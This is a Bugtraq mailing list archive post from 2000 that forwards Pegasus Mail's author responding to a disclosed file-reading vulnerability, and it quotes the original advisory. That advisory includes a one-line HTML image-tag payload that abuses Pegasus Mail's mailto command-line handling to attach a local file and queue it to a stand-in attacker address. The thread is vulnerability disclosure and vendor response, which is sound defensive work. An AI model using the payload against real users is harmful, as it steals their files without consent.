Bugtraq mailing list archives
Re: Pegasus mail file reading vulnerability (fwd)
From: Richard Stevenson <richard.stevenson () TEAM XTRA CO NZ>
Date: Wed, 4 Oct 2000 14:00:15 +1300
Hi Aleph1 My apologies for this... I'm not subscribed to Bugtraq at present, but this is Pegasus Mail Central's response to the threat publicised on BugTraq recently, so it'll have to go through the moderator. Regards Richard -- Richard Stevenson | Help Microsoft stamp out software Systems Support Specialist | piracy: install Linux today! richard.stevenson () team xtra co nz | Phone +64 9 355 5231 | <http://www.linux.org> Mobile +64 25 2903101 | ---------- Forwarded message ---------- From: David Harris <David.Harris () pmail gen nz> To: Imran Ghory <ImranG () BTINTERNET COM> Date: Wed, 4 Oct 2000 13:54:02 +1300 X-Mailer: Pegasus Mail for Win32 (v4.0, pre-alpha) Cc: Mark Borrie <mark () gandalf otago ac nz>, Richard.Stevenson () team xtra co nz Subject: Re: Pegasus mail file reading vulnerability Mr Ghory has posted an announcement of a potential security hole in Pegasus Mail, the text for which appears at the end of this message. Well, I'm the vendor. It's a shame Mr Ghory didn't give us a chance to prepare for the wave of panic, dismay and inundation of mail that a posting like this always provokes, but never mind. Firstly, I'll do the responsible thing and admit that as far as I can tell, this exploit is feasible. It takes advantage of the fact that Pegasus Mail has a commandline interface that can be invoked from within a web browser. Please note that the URL as presented in the report will not work correctly on the majority of systems - Pegasus Mail requires the formal RFC1738 syntax for URLs containing spaces. But if properly represented, it could produce the described effect. My assessment of the risk involved in this exploit is that it is moderate at worst. The hacker would need to have exact knowledge of the layout of the victim's system, and would need to find some way of enticing the victim to read a page containing the specific link needed to activate the exploit. Furthermore, even if Pegasus Mail is running, there will almost always be telltale indications to the user that something has happened. It is worth stressing that this vulnerability exists only in the case of links activated from a web browser - Pegasus Mail already deals with internal mail-based linkages like this. It is my belief that this exploit may have counterparts in other mail programs. I suspect that any mail program that has a method for being invoked from a browser may potentially have a vulnerability along these lines. I say this not to produce FUD, but in the hope that other developers will examine their code and satisfy themselves that they are not at risk from this kind of exploit. We currently have a replacement component in development which handles the link between the browser and Pegasus Mail: this component was developed primarily to deal with other non-security- related problems, but I will add some code to it to detect links that send files (something that should never happen in normal use) and release it publicly as soon as is humanly possible. I am not subscribed to BugTraq (I probably should be) - so I am asking my spokesman on the list, Richard Stevenson, to post this reaction to the list on my behalf (thanks Richard!). I would thank Mr Ghory for bringing this to our attention, but he hasn't done so yet. Cheers! -- David -- Author/Owner, Pegasus Mail System. ------------- Original report follows ------------------------- SUMMARY The default setup of Pegasus Mail contains a remotely exploitable security hole that allows a remote website to gain copies of files on the users hard drive. DETAILS Version tested: Pegasus Mail v3.12c with IE5.0 When the webpage containing the exploit code is viewed using IE5, Pegasus mail will automatically creates a message which has a copy of the file "c:\test.txt" and is addressed to "hacker () hakersite com" and queues it ready to be sent without any further user intervention If instead of "hacker () hakersite com" we have a local user, "hacker" the message won't be queued but just sent immediately. Exploit code: <img src="mailto:hacker () hakersite com -F c:\test.txt"> Temporary Fix: 1) Don't run Pegasus Mail at the same time as a web browser This is not a complete solution as Pegasus Mail will load up if the exploit code is run, but this at least will be more noticable to the user. Vendor: As I earlier posted a message to vuln-dev giving the basics of this exploit without the realizing the consequeces (at that stage the user had to click on a link for the exploit to come into play), I have decided to publish the full exploit before contacting the vendor. ------------------ David Harris -+- Pegasus Mail ---------------------- Box 5451, Dunedin, New Zealand | e-mail: David.Harris () pmail gen nz Phone: +64 3 453-6880 | Fax: +64 3 453-6612 Thought for the day: Book (n): a utensil used to pass time while waiting for the TV repairman.
Current thread:
- Re: Pegasus mail file reading vulnerability (fwd) Richard Stevenson (Oct 03)